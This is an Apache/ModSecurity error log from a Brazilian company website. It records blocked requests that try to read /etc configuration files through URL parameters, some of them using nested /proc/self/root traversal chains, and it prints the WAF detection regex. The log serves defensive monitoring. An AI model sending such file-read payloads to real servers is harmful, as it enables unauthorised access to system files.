[Wed Mar 18 04:27:58.202330 2026] [:error] [pid 15826:tid 140411691570944] [client 216.73.216.191:60650] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpT_uoXxyEfFpUF8f8xkQAAAUY"]
[Wed Mar 18 04:28:00.639355 2026] [:error] [pid 26799:tid 140411699963648] [client 216.73.216.191:60762] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/centos-release-upstream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpUANa6ubjKNq_cu4ZbrAAAA0U"]
[Wed Mar 18 04:28:01.323190 2026] [:error] [pid 31803:tid 140411557287680] [client 216.73.216.191:60862] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/logrotate.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpUAeyqAr6etmhZHNp-gQAAAFY"]
[Wed Mar 18 04:28:01.635868 2026] [:error] [pid 17887:tid 140411666392832] [client 216.73.216.191:60884] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/inittab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpUAQkwaGbbGflqUZDXQQAAAMk"]
[Wed Mar 18 04:28:02.343099 2026] [:error] [pid 17887:tid 140411607643904] [client 216.73.216.191:60912] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/libaudit.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpUAgkwaGbbGflqUZDXQwAAANA"]
[Wed Mar 18 04:28:02.451145 2026] [:error] [pid 15051:tid 140411733534464] [client 216.73.216.191:60920] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpUAimAPhZkrhU8w4kyTAAAAIE"]
[Wed Mar 18 04:28:04.363566 2026] [:error] [pid 26799:tid 140411616036608] [client 216.73.216.191:32822] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/man_db.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpUBNa6ubjKNq_cu4ZbswAAA08"]
[Wed Mar 18 04:28:04.588606 2026] [:error] [pid 19507:tid 140411624429312] [client 216.73.216.191:32834] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts.deny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpUBNY0UrI5A3LftIxXzAAAAY4"]
[Wed Mar 18 04:28:04.588931 2026] [mime_magic:error] [pid 19507:tid 140411624429312] (70014)End of file found: [client 216.73.216.191:32834] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 04:28:07.279379 2026] [:error] [pid 15826:tid 140411607643904] [client 216.73.216.191:32956] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/geoip.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpUB-oXxyEfFpUF8f8xmwAAAVA"]
[Wed Mar 18 04:28:08.773801 2026] [:error] [pid 15051:tid 140411590858496] [client 216.73.216.191:33100] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/adjtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpUCCmAPhZkrhU8w4kyWAAAAJI"]
[Wed Mar 18 04:28:08.795427 2026] [:error] [pid 17653:tid 140411674785536] [client 216.73.216.191:33104] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/grep_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpUCMdf6f5d65gmYZSWIQAAAsg"]
[Wed Mar 18 04:28:09.207702 2026] [:error] [pid 30077:tid 140411582465792] [client 216.73.216.191:33134] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/freetds.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpUCfu8EFLIOrSqIpvLKgAAAlM"]
[Wed Mar 18 04:28:41.127705 2026] [:error] [pid 15051:tid 140411540502272] [client 216.73.216.191:33866] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/krb5.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpUKSmAPhZkrhU8w4kyagAAAJg"]
[Wed Mar 18 04:28:43.454843 2026] [:error] [pid 29882:tid 140411741927168] [client 216.73.216.191:33956] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/yum.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpUKkzinOy1jxa1j4fXuAAAAQA"]
[Wed Mar 18 04:28:44.675249 2026] [:error] [pid 11816:tid 140411565680384] [client 216.73.216.191:33952] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/makedumpfile.conf.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpULOw_le52K8_3pV2leQAAAhU"]
[Wed Mar 18 04:28:46.591038 2026] [:error] [pid 26799:tid 140411641214720] [client 216.73.216.191:34170] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/chrony.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpULta6ubjKNq_cu4ZbwgAAA0w"]
[Wed Mar 18 04:28:47.691904 2026] [:error] [pid 29882:tid 140411548894976] [client 216.73.216.191:34236] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mke2fs.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpUL0zinOy1jxa1j4fXvAAAARc"]
[Wed Mar 18 04:28:48.812813 2026] [:error] [pid 29882:tid 140411616036608] [client 216.73.216.191:34312] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/csh.login"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpUMEzinOy1jxa1j4fXvgAAAQ8"]
[Wed Mar 18 04:28:51.035143 2026] [:error] [pid 30077:tid 140411582465792] [client 216.73.216.191:34468] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/.pwd.lock"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpUM_u8EFLIOrSqIpvLRwAAAlM"]
[Wed Mar 18 04:28:54.891002 2026] [:error] [pid 11816:tid 140411540502272] [client 74.7.241.31:57844] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpUNuw_le52K8_3pV2liwAAAhg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:29:07.335539 2026] [:error] [pid 15051:tid 140411666392832] [client 74.7.241.31:57134] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpUQymAPhZkrhU8w4kygwAAAIk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:29:26.271980 2026] [:error] [pid 29882:tid 140411683178240] [client 216.73.216.191:35664] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/resolv.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpUVkzinOy1jxa1j4fX5AAAAQc"]
[Wed Mar 18 04:29:42.815647 2026] [:error] [pid 31803:tid 140411666392832] [client 216.73.216.191:36494] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/csh.cshrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpUZuyqAr6etmhZHNp-9wAAAEk"]
[Wed Mar 18 04:29:46.850743 2026] [:error] [pid 19507:tid 140411691570944] [client 216.73.216.191:36618] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors.lightbgcolor"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpUadY0UrI5A3LftIxYBwAAAYY"]
[Wed Mar 18 04:29:46.869805 2026] [:error] [pid 31803:tid 140411557287680] [client 216.73.216.191:36688] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/locales.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpUauyqAr6etmhZHNp-_wAAAFY"]
[Wed Mar 18 04:30:31.406120 2026] [mime_magic:error] [pid 30077:tid 140411540502272] (70014)End of file found: [client 216.73.216.191:37646] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 04:30:31.991283 2026] [:error] [pid 17653:tid 140411540502272] [client 216.73.216.191:37688] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mime.types"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpUl8df6f5d65gmYZSWawAAAtg"]
[Wed Mar 18 04:30:32.803543 2026] [:error] [pid 15826:tid 140411741927168] [client 216.73.216.191:37748] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/localtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpUmOoXxyEfFpUF8f8x5AAAAUA"]
[Wed Mar 18 04:30:33.278585 2026] [:error] [pid 31803:tid 140411708356352] [client 216.73.216.191:37776] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpUmeyqAr6etmhZHNp_JQAAAEQ"]
